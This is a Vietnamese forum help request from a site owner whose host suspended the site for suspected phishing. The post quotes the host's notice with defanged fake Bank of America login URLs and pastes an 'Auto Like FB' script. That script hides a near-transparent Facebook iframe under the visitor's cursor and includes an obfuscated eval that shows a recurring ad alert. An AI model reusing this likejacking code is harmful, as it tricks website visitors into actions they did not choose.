hoanghuy9514
W-------
-
22/09/2014
-
0
-
1 bài viết
[HELP] Website bị dính mã độc !
Web mình đang chạy ngon lành, hôm nay bị bên dịch vụ Hosting Suspend, lý do là nó nghi ngờ web mình tình nghi lừa đảo :
Cách đây vài hôm thì mình có chèn code Auto Like FB vào web, không biết có phải vì thằng này không ?
Nhờ AE tư vấn giúp mình với ! Thanks.
Mã:
Our company investigates computer crime incidents on behalf of banks and other companies.
A phishing site was found to be operating on your network and targeting Bank of America Corporation Online Banking customers:
hXXp://secure.bankofamerica.com-login-sign-in-signonscreen.goscreen.go.request. hue360 .net/sign-in/signonSetup.php
hXXp://secure.bankofamerica.com-login-sign-in-signonscreen.goscreen.go.request. hue360 .net/sign-in/sitekey.php
hXXp://secure.bankofamerica.com-login-sign-in-signonscreen.goscreen.go.request. hue360 .net/sign-in/contactinfo.php
Mã:
var fan_page_url = 'https://www.facebook.com/itviet360'
var opacity =0.04;
var time = 45000;
if((document.getElementById) && window.addEventListener || window.attachEvent){
(function(){
var hairCol = "#ff0000";
var d = document;
var my = -10;
var mx = -10;
var r;
var vert = "";
var idx = document.getElementsByTagName('div').length;
var thehairs = "";
var like;
var faceLike=getCookie("faceLike");
if (faceLike!=null && faceLike!="")
{
}
else
{
setCookie("faceLike",'liked',1);
document.write(thehairs);
like = document.getElementById("theiframe");
document.getElementsByTagName('body')[0].appendChild(like);
}
eval('\u0073\u0065\u0074\u0049\u006e\u0074\u0065\u0072\u0076\u0061\u006c\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0047\u0069\u0061\u0069\u0070\u0068\u0061\u0070\u0074\u0068\u0075\u006f\u006e\u0067\u0068\u0069\u0065\u0075\u002e\u006f\u0072\u0067\u0020\u0063\u0068\u0075\u0079\u00ea\u006e\u0020\u0074\u0072\u0061\u006e\u0067\u0020\u006d\u0061\u0072\u006b\u0065\u0074\u0069\u006e\u0067\u0020\u0077\u0065\u0062\u0073\u0069\u0074\u0065\u0022\u0029\u007d\u002c\u0031\u0038\u0030\u0030\u0030\u0030\u0030\u0030\u0029\u003b');
var pix = "px";
var domWw = (typeof window.innerWidth == "number");
var domSy = (typeof window.pageYOffset == "number");
if (domWw)
r = window;
else{
if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0)
r = d.documentElement;
else{
if (d.body && typeof d.body.clientWidth == "number")
r = d.body;
}
}
if(time != 0){
setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(like);
if (window.addEventListener){
document.removeEventListener("mousemove",mouse,false);
}
else if (window.attachEvent){
document.detachEvent("onmousemove",mouse);
}
}, time);
}
function scrl(yx){
var y,x;
if (domSy){
y = r.pageYOffset;
x = r.pageXOffset;
}
else{
y = r.scrollTop;
x = r.scrollLeft;
}
return (yx == 0) ? y:x;
}
function mouse(e){
var msy = (domSy)?window.pageYOffset:0;
if (!e)
e = window.event;
if (typeof e.pageY == 'number'){
my = e.pageY - 15 - msy;
mx = e.pageX - 34;
}
else{
my = e.clientY - 16 - msy;
mx = e.clientX - 36;
}
vert.top = my + scrl(0) + pix;
vert.left = mx + pix;
}
function ani(){
vert.top = my + scrl(0) + pix;
setTimeout(ani, 300);
}
function init(){
vert = document.getElementById("theiframe").style;
ani();
}
function getCookie(c_name)
{
var c_value = document.cookie;
var c_start = c_value.indexOf(" " + c_name + "=");
if (c_start == -1)
{
c_start = c_value.indexOf(c_name + "=");
}
if (c_start == -1)
{
c_value = null;
}
else
{
c_start = c_value.indexOf("=", c_start) + 1;
var c_end = c_value.indexOf(";", c_start);
if (c_end == -1)
{
c_end = c_value.length;
}
c_value = unescape(c_value.substring(c_start,c_end));
}
return c_value;
}
function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}
function checkCookie()
{
var faceLike=getCookie("faceLike");
if (faceLike!=null && faceLike!="")
{
alert("Welcome again " + faceLike);
}
else
{
setCookie("faceLike",'liked',1);
}
}
if (window.addEventListener){
window.addEventListener("load",init,false);
document.addEventListener("mousemove",mouse,false);
}
else if (window.attachEvent){
window.attachEvent("onload",init);
document.attachEvent("onmousemove",mouse);
}
})();
}//End